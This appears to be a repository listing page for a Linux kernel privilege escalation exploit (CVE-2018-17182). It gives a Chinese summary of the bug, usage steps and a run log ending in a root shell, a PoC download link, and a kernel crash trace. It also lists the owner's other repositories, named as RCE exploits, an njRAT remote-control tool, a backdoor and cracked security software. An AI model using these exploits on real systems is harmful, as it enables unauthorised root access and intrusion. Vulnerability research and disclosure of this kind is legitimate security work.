• Stars
    star
    129
  • Rank 279,262 (Top 6 %)
  • Language
    C
  • Created about 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182)

About

Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16到4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。

由白帽黑客Jann Horn发现,内核漏洞(CVE-2018-17182)是Linux内存管理子系统中的缓存失效错误,导致释放后使用漏洞,

如果被利用,可能允许攻击者获得root权限目标系统上的特权.

免费使用后(UAF)漏洞是一类内存损坏错误,非特权用户可利用这些错误来破坏或更改内存中的数据,从而导致拒绝服务(系统崩溃)或升级权限以获得管理权限访问系统

Linux内核漏洞于9月18日在oss-security邮件列表中公开,并在第二天在上游支持的稳定内核版本4.18.9,4.14.71,4.9.128和4.4.157中进行了修补.

在3.16.58版本中也有一个修复程序。

Attaching an ugly exploit for Ubuntu 18.04, kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37.

It takes about (40min~1hour) to run before popping a root shell.

Linux内核利用需要一个小时才能获得Root访问权限

Usage: First compile with ./compile.sh, then run ./puppeteer. Example run:

user@ubuntu-18-04-vm:~/vmacache$
user@ubuntu-18-04-vm:~/vmacache$
user@ubuntu-18-04-vm:~/vmacache$ ./puppeteer 
Do Sep 20 23:55:11 CEST 2018
puppeteer: old kmsg consumed
got map from child!
got WARNING
got RSP line: 0xffff9e0bc2263c60
got RAX line: 0xffff8c7caf1d61a0
got RDI line: 0xffff8c7c214c7380
reached WARNING part 2
got R8 line: 0xffffffffa7243680
trace consumed
offset: 0x110
fake vma pushed
suid file detected, launching rootshell...
we have root privs now...
Fr Sep 21 00:48:00 CEST 2018
root@ubuntu-18-04-vm:~/vmacache# 
root@ubuntu-18-04-vm:~/vmacache# 
root@ubuntu-18-04-vm:~/vmacache# 
root@ubuntu-18-04-vm:~/vmacache# 

start=23:55:11
stop=00:48:00  :)

Proof of Concept:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip

Usage: Within around 40 minutes

user@debian:~/vma_bug$ gcc -O2 -o vma_test vma_test.c -g && ./vma_test
Segmentation fault
 
 
Within around 40 minutes, I get the following warning in dmesg:
 
=============================================
[ 2376.292518] WARNING: CPU: 0 PID: 1103 at mm/vmacache.c:157 vmacache_find+0xbb/0xd0
[ 2376.296813] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 2376.300095] CPU: 0 PID: 1103 Comm: vma_test Not tainted 4.19.0-rc3+ #161
[ 2376.303650] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 2376.305796] RIP: 0010:vmacache_find+0xbb/0xd0
[ 2376.306963] Code: 48 85 c0 74 11 48 39 78 40 75 1f 48 39 30 77 06 48 39 70 08 77 19 83 c2 01 83 fa 04 41 0f 44 d1 83 e9 01 75 c7 31 c0 c3 f3 c3 <0f> 0b 31 c0 c3 65 48 ff 05 98 97 9b 6a c3 90 90 90 90 90 90 90 0f
[ 2376.311881] RSP: 0000:ffffa934c1e3bec0 EFLAGS: 00010283
[ 2376.313258] RAX: ffff8ac7eaf997d0 RBX: 0000133700204000 RCX: 0000000000000004
[ 2376.315165] RDX: 0000000000000001 RSI: 0000133700204000 RDI: ffff8ac7f3820dc0
[ 2376.316998] RBP: ffff8ac7f3820dc0 R08: 0000000000000001 R09: 0000000000000000
[ 2376.318789] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa934c1e3bf58
[ 2376.320590] R13: ffff8ac7f3820dc0 R14: 0000000000000055 R15: ffff8ac7e9355140
[ 2376.322481] FS:  00007f96165ca700(0000) GS:ffff8ac7f3c00000(0000) knlGS:0000000000000000
[ 2376.324620] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2376.326101] CR2: 0000133700204000 CR3: 0000000229d28001 CR4: 00000000003606f0
[ 2376.327906] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 2376.329819] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 2376.331571] Call Trace:
[ 2376.332208]  find_vma+0x16/0x70
[ 2376.332991]  ? vfs_read+0x10f/0x130
[ 2376.333852]  __do_page_fault+0x191/0x470
[ 2376.334816]  ? async_page_fault+0x8/0x30
[ 2376.335776]  async_page_fault+0x1e/0x30
[ 2376.336746] RIP: 0033:0x555e2a2b4c37
[ 2376.337600] Code: 05 80 e8 9c fc ff ff 83 f8 ff 0f 84 ad 00 00 00 8b 3d 81 14 20 00 e8 48 02 00 00 48 b8 00 40 20 00 37 13 00 00 bf 37 13 37 13 <c6> 00 01 31 c0 e8 cf fc ff ff 48 83 ec 80 31 c0 5b 5d 41 5c c3 48
[ 2376.342085] RSP: 002b:00007ffd505e8d30 EFLAGS: 00010206
[ 2376.343334] RAX: 0000133700204000 RBX: 0000000100000000 RCX: 00007f9616102700
[ 2376.345133] RDX: 0000000000000008 RSI: 00007ffd505e8d18 RDI: 0000000013371337
[ 2376.346834] RBP: 00007f96165e4000 R08: 0000000000000000 R09: 0000000000000000
[ 2376.348889] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000100000000
[ 2376.350570] R13: 00007ffd505e8ea0 R14: 0000000000000000 R15: 0000000000000000
[ 2376.352246] ---[ end trace 995fa641c5115cfb ]---
[ 2376.353406] vma_test[1103]: segfault at 133700204000 ip 0000555e2a2b4c37 sp 00007ffd505e8d30 error 6 in vma_test[555e2a2b4000+2000]
=============================================
 
The source code corresponding to the warning, which is triggered because
the VMA cache references a VMA struct that has been reallocated to
another process in the meantime:
 
#ifdef CONFIG_DEBUG_VM_VMACACHE
            if (WARN_ON_ONCE(vma->vm_mm != mm))
                break;
#endif
 
 
################################################################################

参考链接:

https://googleprojectzero.blogspot.com/2018/09/a-cache-invalidation-bug-in-linux.html

https://www.exploit-db.com/exploits/45497/

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip

More Repositories

1

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术
C
547
star
2

IDA_Pro_7.2

IDA_Pro_7.2
Shell
487
star
3

oracleShell

oracle 数据库命令执行
439
star
4

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j
434
star
5

CVE-2020-5902

CVE-2020-5902 BIG-IP
Java
376
star
6

Grafana-CVE-2021-43798

Grafana Unauthorized arbitrary file reading vulnerability
Go
329
star
7

St2-057

St2-057 Poc Example
Shell
314
star
8

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root
C
301
star
9

CVE-2020-14882

CVE-2020–14882、CVE-2020–14883
277
star
10

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)
174
star
11

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618
Python
170
star
12

OA-tongda-RCE

Office Anywhere网络智能办公系统
PHP
146
star
13

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞
Python
146
star
14

ncDecode

用友nc数据库密码解密
138
star
15

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码
Shell
120
star
16

2018-QWB-CTF

2018强网杯CTF___题目整理
Python
114
star
17

fuzz-wooyun-org

WooYun Fuzz 库
PHP
107
star
18

solr_rce

Apache Solr RCE via Velocity template
Python
104
star
19

OA-Seeyou

note
Java
104
star
20

CVE-2019-12409

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")
Python
103
star
21

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
Python
101
star
22

CVE-2018-2628

Weblogic 反序列化漏洞(CVE-2018-2628)
Python
101
star
23

CVE-2019-12384

Jackson Rce For CVE-2019-12384
Ruby
98
star
24

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE
96
star
25

CVE-2019-11043

php-fpm+Nginx RCE
Python
96
star
26

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE
91
star
27

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
90
star
28

CVE-2019-0193

Apache Solr DataImport Handler RCE
Python
89
star
29

CVE-2020-8193

Citrix ADC Vulns
Python
85
star
30

CVE-2019-19781

Citrix ADC Remote Code Execution
Python
83
star
31

CVE-2020-2551

Weblogic RCE with IIOP
82
star
32

e-cology

e-cology OA_Beanshell_RCE
Java
80
star
33

zentao-getshell

禅道8.2 - 9.2.1前台Getshell
Python
79
star
34

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Python
77
star
35

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞
Java
76
star
36

Redis-RCE

remote code execute for redis4 and redis5
Python
73
star
37

FinalShellDecodePass

FinalShellDecodePass 加密解密
Java
73
star
38

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE
71
star
39

xxl-job

xxl-job RESTful API RCE
70
star
40

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Python
69
star
41

CVE-2019-16278

Directory transversal to remote code execution
Shell
69
star
42

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable
C
66
star
43

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞
Python
63
star
44

fastjson-RCE

fastjson-1.2.47
62
star
45

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Java
59
star
46

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1
Python
58
star
47

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)
Python
57
star
48

St2-052

St2-052
56
star
49

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞
Python
56
star
50

CVE-2019-11510-1

SSL VPN Rce
Python
54
star
51

GitlabVer

gitlab version index
Shell
52
star
52

SHIRO-550

Shiro RememberMe 1.2.4 反序列化 漏洞
Python
52
star
53

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传
52
star
54

BurpSuite_Pro_v1.7.37

Java
51
star
55

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege
51
star
56

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞
50
star
57

SqlMap_BurpSuite

SqlMap_BurpSuite
Java
44
star
58

msfconsole-termux

How To Install Metasploit-Table on the Android Termux
Shell
42
star
59

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞
41
star
60

cs_yara

check cs yara rules
YARA
40
star
61

st2-048

st2-048
Python
40
star
62

database-spring-ENC

sprint encode (plan text) get enc password
Java
39
star
63

mssql-command-tool

mssql 终端连接工具|命令执行
Go
38
star
64

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)
JavaScript
38
star
65

fastjson-1.2.60-rce

autoType enable
36
star
66

Burp_AES_Plugin

Burpsuite Plugin For AES Crack
Java
35
star
67

mimikat_ssp

Security Support Provider Interface
C++
35
star
68

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞
Python
35
star
69

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
35
star
70

ChromePluginCrx

离线安装Chrome插件-插件备份
33
star
71

JWT_Brute

JWT_Brute
32
star
72

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞
32
star
73

CVE-2019-15642

Webmin Remote Code Execution (authenticated)
Python
32
star
74

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE
Java
32
star
75

CVE-2019-8451

Jira未授权SSRF漏洞
Python
31
star
76

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database
Java
31
star
77

Fortify_Rule

Decode Fortify Rule Bin File Get XML File
Java
29
star
78

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
Java
28
star
79

IDA7.0-Pro

some people share IDA7.0!
25
star
80

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638
Python
25
star
81

OpenFire_Decrypt

OpenFire 管理后台账号密码解密
Java
24
star
82

njRAT-0.7

远控工具Njrat
24
star
83

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
Python
24
star
84

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9
23
star
85

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞
Python
22
star
86

st2-046-poc

st2-046-poc CVE-2017-5638
Shell
22
star
87

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE
21
star
88

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)
21
star
89

CVE-2018-10933

libssh CVE-2018-10933
Python
20
star
90

010-Editor-Template

20
star
91

Java-Compressed-file-security

java web 压缩文件 安全 漏洞
Python
19
star
92

Vmware_vCenter

VMware vCenter(Unauthenticated)
18
star
93

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018
PHP
18
star
94

CVE-2019-3394

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
17
star
95

CTF-RSA-tool

CTF-RSA-tool
C
17
star
96

Security_Article

scrapy website Article and link ...
HTML
17
star
97

Hscan

Hscan-Win-Gui
Python
16
star
98

CVE-2018-2894

Weblogic,CVE-2018-2894
Python
16
star
99

BurpSuite-icns

制作BurpSuite icns 在Mac OS上
16
star
100

phpweb

phpweb 前台任意文件上传
16
star